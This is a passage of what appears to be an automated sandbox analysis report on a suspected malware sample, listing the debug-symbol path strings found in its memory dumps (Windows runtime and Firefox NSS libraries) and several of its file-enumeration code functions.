              Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.493645377.00000000047C4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.455052099.0000000003E44000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493370701.00000000047C0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493845210.00000000047C8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: 6CJfScEKhr.exe, 0000000E.00000003.496671801.0000000003AB0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.497457894.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.483088942.0000000003E44000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.498048842.0000000003AB8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.482231000.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.498532721.0000000003ABC000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.483008786.0000000002A14000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.491983533.0000000004784000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.434459144.0000000003E50000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.492267505.000000000478C000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.492145996.0000000004788000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.491857650.0000000004780000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.434513635.0000000003E44000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.432567018.0000000003E40000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.473472620.0000000003E44000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.496147713.0000000004828000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.496294114.000000000482C000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.475741120.0000000003E54000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.495535221.0000000004800000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.466919518.0000000003E48000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.466873515.0000000003E48000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.465897904.0000000003E48000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.465074490.0000000003E44000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdbSHA256 source: 6CJfScEKhr.exe, 00000000.00000002.406971785.0000000003AB3000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 00000000.00000002.408946193.000000000BFE0000.00000004.08000000.00040000.00000000.sdmp, 6CJfScEKhr.exe, 00000000.00000002.406535494.0000000003991000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 0000000F.00000002.518824108.00000000026A0000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 0000000F.00000002.519864421.0000000003573000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 0000000F.00000002.520995677.0000000005350000.00000004.08000000.00040000.00000000.sdmp, Pthmzffh.exe, 0000000F.00000002.519431243.0000000003451000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 00000015.00000002.519896768.0000000003F31000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 00000015.00000002.519547093.0000000003182000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 00000015.00000002.520559090.0000000004053000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 00000015.00000002.525075431.000000000C620000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: 6CJfScEKhr.exe, 0000000E.00000003.501600068.0000000003CD0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.487505266.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.502068733.0000000003CE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.488200891.0000000003E50000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.500201204.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.499194104.0000000003B60000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.488137540.0000000003E78000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: msvcp140.i386.pdb source: 6CJfScEKhr.exe, 0000000E.00000002.528193608.000000006ED61000.00000020.00000001.01000000.0000000D.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.500081858.0000000003B38000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.485003516.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.484887053.0000000002A14000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.458364916.0000000003E44000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493645377.00000000047C4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493370701.00000000047C0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493845210.00000000047C8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494141522.00000000047CC000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494377340.00000000047D0000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdbUGP source: 6CJfScEKhr.exe, 0000000E.00000003.501600068.0000000003CD0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.502068733.0000000003CE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.500201204.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.499194104.0000000003B60000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.502531240.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.488986283.0000000004970000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.496671801.0000000003AB0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.497457894.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: 6CJfScEKhr.exe, 0000000E.00000003.501600068.0000000003CD0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.487505266.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.500201204.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.499194104.0000000003B60000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.492576915.00000000047A0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.494709446.00000000047D4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493645377.00000000047C4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494987521.00000000047DC000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493370701.00000000047C0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.460534507.0000000003E44000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493845210.00000000047C8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.461364025.0000000003E48000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494141522.00000000047CC000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494377340.00000000047D0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.495083457.00000000047E4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494825630.00000000047D8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.493645377.00000000047C4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493370701.00000000047C0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.430697897.0000000003E44000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.491857650.0000000004780000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.494709446.00000000047D4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.495171916.00000000047E8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493645377.00000000047C4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494987521.00000000047DC000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493370701.00000000047C0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493845210.00000000047C8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.495471714.00000000047F4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.464187220.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494141522.00000000047CC000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.495398232.00000000047F0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494377340.00000000047D0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.495083457.00000000047E4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.465074490.0000000003E44000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494825630.00000000047D8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.495257742.00000000047EC000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.492576915.00000000047A0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.443952981.0000000003E44000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.442753555.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.492747934.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493168297.00000000047B0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.492875018.00000000047A8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493075719.00000000047AC000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.470337933.0000000003E48000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.470419906.0000000003E4C000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.496007152.000000000481C000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.495924593.0000000004818000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.501600068.0000000003CD0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.487505266.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.502068733.0000000003CE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.488200891.0000000003E50000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.500201204.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.499194104.0000000003B60000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.488137540.0000000003E78000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.493645377.00000000047C4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493370701.00000000047C0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493845210.00000000047C8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494141522.00000000047CC000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.448743941.0000000003E48000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.448852988.0000000003E4C000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493370701.00000000047C0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.496147713.0000000004828000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.471412090.0000000003E48000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: vcruntime140.i386.pdb source: 6CJfScEKhr.exe, 0000000E.00000002.529001641.000000006F491000.00000020.00000001.01000000.0000000C.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.502845901.0000000003E28000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.491428593.000000000484C000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.496671801.0000000003AB0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.497457894.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.498048842.0000000003AB8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.482231000.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.494709446.00000000047D4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493645377.00000000047C4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493370701.00000000047C0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493845210.00000000047C8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494141522.00000000047CC000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494377340.00000000047D0000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.501600068.0000000003CD0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.487505266.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.500201204.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.499194104.0000000003B60000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.494709446.00000000047D4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.495171916.00000000047E8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493645377.00000000047C4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494987521.00000000047DC000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493370701.00000000047C0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493845210.00000000047C8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494141522.00000000047CC000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494377340.00000000047D0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.495083457.00000000047E4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494825630.00000000047D8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.495257742.00000000047EC000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.494709446.00000000047D4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.459612640.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493645377.00000000047C4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493370701.00000000047C0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493845210.00000000047C8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494141522.00000000047CC000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494377340.00000000047D0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494825630.00000000047D8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: msvcp140.i386.pdbGCTL source: 6CJfScEKhr.exe, 0000000E.00000002.528193608.000000006ED61000.00000020.00000001.01000000.0000000D.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.500081858.0000000003B38000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.485003516.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.484887053.0000000002A14000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.491983533.0000000004784000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.492450786.0000000004794000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.492267505.000000000478C000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.492145996.0000000004788000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.492385843.0000000004790000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.439937420.0000000003E4C000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.491857650.0000000004780000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.439832449.0000000003E48000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.496147713.0000000004828000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.496294114.000000000482C000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.496387090.0000000004840000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.492576915.00000000047A0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.442753555.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.492747934.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.492875018.00000000047A8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493075719.00000000047AC000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.492576915.00000000047A0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.492747934.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.492875018.00000000047A8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.468531219.0000000003E44000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.495535221.0000000004800000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.495793950.000000000480C000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.467718953.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.495717285.0000000004808000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.495638921.0000000004804000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.496671801.0000000003AB0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.479365495.0000000003E44000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.480618660.0000000003E4C000.00000004.00000800.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 14_2_004098A0 FindFirstFileW,FindNextFileW,FindClose,14_2_004098A0
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 14_2_00408D44 FindFirstFileW,GetFileAttributesW,14_2_00408D44
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 14_2_0041303C FindFirstFileW,FindNextFileW,FindClose,14_2_0041303C
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 14_2_0040989F FindFirstFileW,FindNextFileW,FindClose,14_2_0040989F
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 14_2_004111C4 FindFirstFileW,FindNextFileW,FindClose,14_2_004111C4
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 14_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,14_2_00414408
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 14_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,14_2_00414408
